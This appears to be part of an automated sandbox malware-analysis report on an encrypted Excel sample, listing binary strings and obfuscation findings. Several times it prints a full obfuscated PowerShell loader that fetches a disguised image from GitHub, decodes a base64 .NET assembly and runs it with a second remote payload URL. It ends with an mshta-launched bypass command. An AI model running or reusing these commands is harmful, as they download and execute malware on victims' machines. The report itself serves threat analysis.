nYB1U8RbSOZA1BB4ATp9drOm8MHxvwLPtbH4AZbQMwB4y4NJXzBwObt4Al65utCLBbZhqqXAP4g4Atk84HQJqf60IRbZMlX46cCtwSOd07lKPnLh8o94682lNM67NhqTCTkKYIK46DHmoRDXtuhZrbpBcj246nRIl1ORk4n1PsEKobk466uUQKXCylJ21gp8fdO46mKPkq9WDpTi8SpLyAZ4m2L8oJHFLJlK3hvSyTk4mPrsjYd7F5BvBb6juWk4haR9wWBN20IFtc3dTth4h021BeHX9OMg2RrNCRt4hyAs2KDq7JkhqtmAyPy4h11h8Grbtua8kVUen7V4rbCrfYA3Wvf79ykrZd04r4lEpbrvnLI3Ah0P0pu4r8jcmbomq9fvxGwJJUf4rSwIUHoY99uDkVrFbjs4rkIKt9eTILaMeDij
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdb source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdb source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdbhP\ source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: 7D330000.0.drInitial sample: OLE indicators vbamacros = False
                  Source: 037002451082_10142024.xlsInitial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  barindex
                  Obfuscated command line found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  PowerShell case anomaly found
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; 